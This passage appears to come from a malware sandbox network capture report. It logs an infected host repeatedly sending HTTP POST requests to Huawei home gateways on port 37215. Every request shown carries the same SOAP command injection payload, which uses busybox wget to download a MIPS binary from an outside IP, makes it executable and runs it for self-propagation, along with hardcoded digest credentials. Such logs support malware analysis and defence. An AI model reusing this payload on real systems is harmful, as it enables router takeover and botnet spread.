3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1298192.168.2.1332916197.95.230.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452662945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1299192.168.2.1360658197.201.70.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452739954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1300192.168.2.136004298.221.229.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452776909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1301192.168.2.1334838157.175.98.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452790022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1302192.168.2.134196641.250.145.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452797890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1303192.168.2.133546641.235.121.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452832937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1304192.168.2.1338440218.34.154.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453563929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1305192.168.2.1345910197.93.34.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453583002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1306192.168.2.134171441.78.126.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453658104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1307192.168.2.1358806197.110.115.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453691959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1308192.168.2.134769641.117.27.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453738928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
